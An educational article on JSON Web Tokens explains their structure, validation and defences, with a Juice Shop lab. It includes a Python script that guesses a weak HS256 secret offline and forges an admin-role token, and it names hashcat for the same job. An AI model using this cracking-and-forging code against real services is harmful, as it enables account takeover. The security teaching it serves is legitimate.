TL;DR - Key Takeaways

  • JSON Web Token (JWT) is a compact, URL-safe means of representing claims to be transferred between two parties.
  • JWTs are commonly used for authorization and information exchange in web applications.
  • A JWT consists of three parts: Header, Payload, and Signature.
  • They are often used in Single Sign-On (SSO) systems due to their stateless nature.
  • JWT security is crucial; improper implementation can lead to vulnerabilities like token tampering or replay attacks.
  • Understanding JWTs involves grasping their structure, how they are created, and how they are validated.
  • Always keep secret keys secure and use HTTPS to protect JWTs from being intercepted.

What is JWT?

JSON Web Token (JWT) is a compact, URL-safe container for claims passed between two parties. Think of a postcard with a wax seal: anyone who handles it can read the text, but any change to the text breaks the seal. A JWT encodes its claims as JSON and, in its common signed form (a JWS), protects their integrity with a MAC or digital signature. It does not hide them; that is a separate, encrypted form (JWE) that most applications never use.

A JWT is composed of three parts:

  1. Header: Metadata about the token: its type and the signing algorithm (e.g., HS256, HMAC with SHA-256, or RS256, RSA with SHA-256).
  2. Payload: The claims being transmitted, such as a subject identifier, issue and expiry times, or roles.
  3. Signature: Protects the other two parts from alteration. It is computed over the string base64url(header) + "." + base64url(payload) with a shared secret (HMAC) or a private key (RSA, ECDSA, EdDSA).

Combined, these parts are Base64URL-encoded and joined with periods, giving a string like:

    eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

Why Does This Matter?

JWTs sit on the trust boundary of most modern web stacks: a server that accepts one is deciding who the caller is and what they may do, based solely on what the token says and whether its signature checks out. They are widely used in applications for:

  • Authorization: Once a user logs in, each subsequent request will include the JWT, allowing the user to access routes, services, and resources that are permitted with that token.
  • Information Exchange: JWTs are a convenient way of passing claims between parties. Because they are signed, the receiving party can verify who issued the token and that its contents were not altered in transit.

Token-handling mistakes map directly onto well-known risk categories: in the OWASP Top 10 (2021), weak session and token validation falls under A07 Identification and Authentication Failures, and weak or misused signing keys under A02 Cryptographic Failures. A single flaw in how a server verifies tokens affects every user who holds one.

Types / Categories

JWTs are generally classified by their usage and structure. Here’s a breakdown:

    Type           Description
    -------------  ------------------------------------------------------------------
    Access Token   Used to access protected resources. Short-lived; the usual bearer
                   token in OAuth 2.0 (may be a JWT or an opaque string).
    ID Token       Carries user profile claims for the client application; defined by
                   OpenID Connect and always a JWT.
    Refresh Token  Used to obtain a new access token without re-authenticating.
                   Longer-lived and therefore sensitive; often opaque rather than a JWT.

JWT vs Other Tokens

    Feature     JWT                 OAuth 2.0 Access Token       SAML Assertion
    ----------  ------------------  ---------------------------  ----------------------
    Format      JSON                Varies (opaque or JWT)       XML
    Encoding    Base64URL           Varies                       Base64
    Signature   Yes (JWS)           Varies                       Yes (XML Signature)
    Use case    API security, SSO   Delegated authorization      Authentication, SSO

Note that "OAuth access token" names a role in a protocol, not a format: an OAuth access token can itself be a JWT.

How It Works — Step by Step

Understanding JWT involves knowing how it is created, transmitted, and validated:

  1. Creation: A server generates a JWT after verifying the user's credentials. The claims it wants to assert (subject, issue time, expiry, roles) are placed in the payload.
  2. Signing: The token is signed with the server's secret key (HMAC) or private key (RSA/ECDSA/EdDSA).
  3. Transmission: The JWT is returned to the client, stored (in a cookie or, less safely, browser storage), and sent with later requests, typically in an Authorization: Bearer header or a cookie.
  4. Validation: The server checks that the token has the expected structure and algorithm, verifies the signature with its own key, and only then evaluates the claims (expiry, not-before, issuer, audience, subject).

  The exchange as a sequence diagram (Mermaid source):

    sequenceDiagram
        participant Client
        participant Server
        Client->>Server: Sends Login Request (username, password)
        Server->>Client: Returns JWT
        Client->>Server: Sends Request with JWT
        Server->>Client: Validates JWT & Responds with Data

  A sample JWT header, naming the signing algorithm:

    {
      "alg": "HS256",
      "typ": "JWT"
    }

  • The header states which algorithm the issuer used. It arrives from the client, so a verifier must treat it as untrusted input and compare it against the algorithms it expects rather than obey it.
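The four steps above, worked through in plain Python with only the standard library. This is an added example, not code from the original article or from any JWT library: encode_jwt builds the three segments described in the "What is JWT?" section, and decode_jwt performs step 4 the way a hardened verifier should (algorithm allowlist, constant-time signature comparison, claim checks only after the signature is trusted). The secret is assumed to be the jwt.io debugger default, "your-256-bit-secret", so the issued token matches the sample string quoted earlier; the tampered, alg=none and expired tokens are constructed inline to show what a verifier must reject.

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

# Assumed for the example: the jwt.io debugger's default secret, chosen only so the
# output matches the sample token quoted above. Never ship a guessable secret.
SECRET = b"your-256-bit-secret"
# The verifier's own allowlist. The header's "alg" is attacker-controlled input and
# must never decide which algorithm (or whether any) is used; "none" is never allowed.
ALLOWED_ALGS = {"HS256"}

SAMPLE_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ."
    "SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"
)

def b64url_encode(raw: bytes) -> str:
    # RFC 7515 base64url: URL-safe alphabet with the "=" padding removed
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")

def b64url_decode(text: str) -> bytes:
    # put the padding back before decoding
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def hs256(signing_input: bytes, secret: bytes) -> bytes:
    return hmac.new(secret, signing_input, hashlib.sha256).digest()

def encode_jwt(payload: dict, secret: bytes) -> str:
    """Build header.payload.signature exactly as the three-part description says."""
    header = {"alg": "HS256", "typ": "JWT"}
    # compact JSON (no whitespace) is what jwt.io and most libraries produce
    parts = [b64url_encode(json.dumps(obj, separators=(",", ":")).encode())
             for obj in (header, payload)]
    signing_input = ".".join(parts).encode("ascii")   # "<header>.<payload>"
    parts.append(b64url_encode(hs256(signing_input, secret)))
    return ".".join(parts)

def decode_jwt(token: str, secret: bytes, now: Optional[int] = None) -> dict:
    """Verify a compact JWS and return its claims; raise ValueError otherwise."""
    segments = token.split(".")
    if len(segments) != 3:
        raise ValueError("token must have exactly three segments")
    h, p, s = segments
    header = json.loads(b64url_decode(h))
    # 1. algorithm pinning: compare against our allowlist, not the header's wish
    if header.get("alg") not in ALLOWED_ALGS:
        raise ValueError(f"algorithm not allowed: {header.get('alg')!r}")
    # 2. recompute the MAC over the exact bytes received; compare in constant time
    expected = hs256(f"{h}.{p}".encode("ascii"), secret)
    if not hmac.compare_digest(expected, b64url_decode(s)):
        raise ValueError("bad signature")
    # 3. only after the signature is trusted do the claims mean anything
    claims = json.loads(b64url_decode(p))
    now = int(time.time()) if now is None else now
    if "exp" in claims and now >= claims["exp"]:
        raise ValueError("token expired")
    if "nbf" in claims and now < claims["nbf"]:
        raise ValueError("token not yet valid")
    return claims

def demo() -> dict:
    """Issue a token, then try the cases a verifier must reject. Returns the outcomes."""
    def attempt(tok: str, now: Optional[int] = None) -> str:
        try:
            decode_jwt(tok, SECRET, now)
            return "accepted"
        except ValueError as err:
            return str(err)

    token = encode_jwt({"sub": "1234567890", "name": "John Doe", "iat": 1516239022}, SECRET)
    out = {"matches_sample": token == SAMPLE_TOKEN, "valid": decode_jwt(token, SECRET)}

    # Tampering: edit the payload segment but keep the original signature.
    h, _, s = token.split(".")
    forged_payload = b64url_encode(b'{"sub":"1234567890","name":"admin"}')
    out["tampered"] = attempt(".".join([h, forged_payload, s]))

    # Algorithm stripping: header claims "none" and the signature segment is empty.
    none_header = b64url_encode(b'{"alg":"none","typ":"JWT"}')
    out["alg_none"] = attempt(none_header + "." + forged_payload + ".")

    # Expiry: a 5-minute token checked 10 s and then 301 s after issue.
    issued = 1516239022
    short = encode_jwt({"sub": "1234567890", "iat": issued, "exp": issued + 300}, SECRET)
    out["fresh"] = attempt(short, now=issued + 10)
    out["expired"] = attempt(short, now=issued + 301)
    return out

if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The ordering inside decode_jwt is the point: the algorithm is decided by the verifier before any cryptography runs, the signature is checked before any claim is read, and the clock is consulted last. A verifier that reads "exp" or "sub" from an unverified payload, or lets the header choose between HMAC and RSA, has already lost.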

Hands-On Lab / Demo

For a practical demonstration, let's use the OWASP Juice Shop, a vulnerable web application ideal for learning about JWT security.

Step-by-Step Lab:

  1. Setup Juice Shop: Use Docker to set up the Juice Shop environment.

    docker run --rm -p 3000:3000 bkimminich/juice-shop
    
    • This command starts the Juice Shop server on your local machine.
  2. Intercept JWT: Use a tool like Burp Suite to capture the HTTP traffic and identify JWTs being transmitted.

  3. Decode JWT: Decode the JWT and inspect its contents. Prefer a local script for anything captured from a real target; pasting a live token into an online decoder hands a bearer credential to a third party.

    # Requires PyJWT:  pip install PyJWT
    import jwt

    token = 'eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiam9obi5kb2UifQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c'

    # Decode only: the signature is deliberately NOT checked, so this shows what the
    # token claims, not whether the server would accept it.
    decoded = jwt.decode(token, options={"verify_signature": False})
    print(decoded)                        # {'user': 'john.doe'}
    print(jwt.get_unverified_header(token))   # {'alg': 'HS256', 'typ': 'JWT'}
    
    • This script decodes a JWT without verifying the signature, which is what you want for inspection; the header is read the same way.
  4. Modify and Resend: Tamper with the payload (for example a role or user-id claim), resend the token and observe the server's response. A correct server rejects it, since the signature no longer matches; acceptance means the signature is not being verified at all.
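Before tampering, the check a tester runs on any token whose header says HS256 is whether the shared secret is guessable: with a recovered secret, step 4 produces tokens the server will accept rather than reject. The following is an added example and not part of the Juice Shop lab or its code. The wordlist and the "captured" token are constructed inline (the token is signed with the weak secret secret123 so the search succeeds); the claim names in it are invented for the example.

```python
import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional

# Constructed for the example: a tiny wordlist standing in for a real one, and
# (below) a token signed with a secret that happens to be in it.
WORDLIST = ["password", "changeme", "jwt-secret", "secret123", "letmein"]

def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")

def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def sign_hs256(header_b64: str, payload_b64: str, secret: bytes) -> str:
    signing_input = f"{header_b64}.{payload_b64}".encode("ascii")
    return b64url_encode(hmac.new(secret, signing_input, hashlib.sha256).digest())

def captured_token() -> str:
    # Stands in for a token captured in Burp. Constructed here with the weak
    # secret "secret123" so the example runs offline; the claims are invented.
    h = b64url_encode(b'{"alg":"HS256","typ":"JWT"}')
    p = b64url_encode(b'{"sub":"42","email":"user@example.com","role":"customer"}')
    return f"{h}.{p}.{sign_hs256(h, p, b'secret123')}"

def find_secret(token: str, candidates: Iterable[str]) -> Optional[str]:
    """Offline dictionary check: recompute the HMAC under each candidate secret.
    Nothing is sent to the server, so rate limiting and logging never see it."""
    h, p, s = token.split(".")
    if json.loads(b64url_decode(h)).get("alg") != "HS256":
        return None   # only HMAC-signed tokens have a shared secret to guess
    for word in candidates:
        if hmac.compare_digest(sign_hs256(h, p, word.encode()), s):
            return word
    return None

def forge(token: str, secret: bytes, changes: dict) -> str:
    """Step 4 of the lab with a known secret: change claims and re-sign."""
    h, p, _ = token.split(".")
    claims = json.loads(b64url_decode(p))
    claims.update(changes)
    new_p = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    return f"{h}.{new_p}.{sign_hs256(h, new_p, secret)}"

def demo() -> dict:
    token = captured_token()
    secret = find_secret(token, WORDLIST)
    if secret is None:
        return {"secret": None}
    forged = forge(token, secret.encode(), {"role": "admin"})
    h, p, s = forged.split(".")
    return {
        "secret": secret,
        "forged_role": json.loads(b64url_decode(p))["role"],
        # a server holding the same weak secret would accept this token
        "forged_verifies": hmac.compare_digest(sign_hs256(h, p, secret.encode()), s),
    }

if __name__ == "__main__":
    print(demo())
```

Against a real token, replace WORDLIST with a proper list or hand the token to hashcat (mode 16500, JWT). A miss does not prove the secret is strong, only that it is not in the list; a hit means every claim in every token from that issuer is attacker-controlled until the key is rotated.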

Common Misconceptions

Myth 1: JWTs Are Always Secure

Many believe JWTs are secure by default. However, their security depends on proper implementation, including securing the secret key and using HTTPS.

Myth 2: JWTs Encrypt Data

A signed JWT (JWS, the form almost everyone means) does not encrypt its payload; it only Base64URL-encodes it, so anyone holding the token can read every claim. If a token must carry sensitive data, use the encrypted form (JWE) or, better, keep the data server-side and put only an identifier in the token.

📌 Key Point: JWTs are not inherently secure. Their security depends on the algorithms and configurations used.

Myth 3: JWTs Are Best for Everything

While versatile, JWTs are a poor fit where immediate revocation is required: a signed token stays valid until its exp passes, and the server cannot recall it without keeping a denylist or a session store, which brings back the state the token was supposed to remove.

How to Defend Against It

  1. Pin the Algorithm: The verifier must enforce its own allowlist of expected algorithms and reject anything else, including none; it must never let the alg field in the header choose. HS256 is not weak in itself, but it needs a random secret of at least 256 bits and every verifier holds that same secret, so asymmetric algorithms (RS256, ES256, EdDSA) are preferred when several services verify tokens from one issuer. Also guard against key confusion: a verifier that accepts both HMAC and RSA with a single key parameter can be tricked into using the public key as an HMAC secret.

    {
      "alg": "RS256",
      "typ": "JWT"
    }
    
    • Example header for an RS256-signed token. The verifier should still check that this is the algorithm it expects, not simply act on it.
  2. Secure Key Management: Keep signing keys out of source code and configuration files, load them from a secrets store, and rotate them on a schedule. Give each key a kid so that tokens issued under the old key can still be verified during the rotation window and then retired.

  3. Implement Token Expiration: Issue access tokens with a short exp (minutes, not days) and make the verifier reject expired tokens; expiry is the only revocation a stateless token gets.

  4. Store Securely: In browsers, keep the JWT in a cookie with HttpOnly, Secure and SameSite set rather than in local storage. HttpOnly does not stop XSS, but it keeps the token out of reach of any script that does get injected; Secure stops it leaving over plain HTTP; SameSite limits cross-site requests that would otherwise carry the cookie automatically (CSRF), which a cookie-borne token is exposed to in a way a bearer header is not.

    Set-Cookie: jwt=eyJhbGci...; HttpOnly; Secure; SameSite=Strict; Path=/
    
    • Example of a cookie carrying a JWT with the attributes a browser-stored token needs.
  5. Use HTTPS: Always transmit JWTs over HTTPS to prevent interception.

📌 Key Point: Implementing strong algorithms and secure storage practices is critical for JWT security.

Conclusion

JWTs are a fundamental part of modern web security, giving applications a compact, tamper-evident way to carry identity and authorization claims between services. Their advantages come with a narrow margin for error: the verifier must pin the algorithm, protect and rotate its keys, check expiry, and store and transmit tokens carefully, or the token becomes the attacker's credential. As you go deeper into web security, remember that understanding the format and verifying it correctly are your best defences. Keep learning, experimenting, and securing your applications with these practices.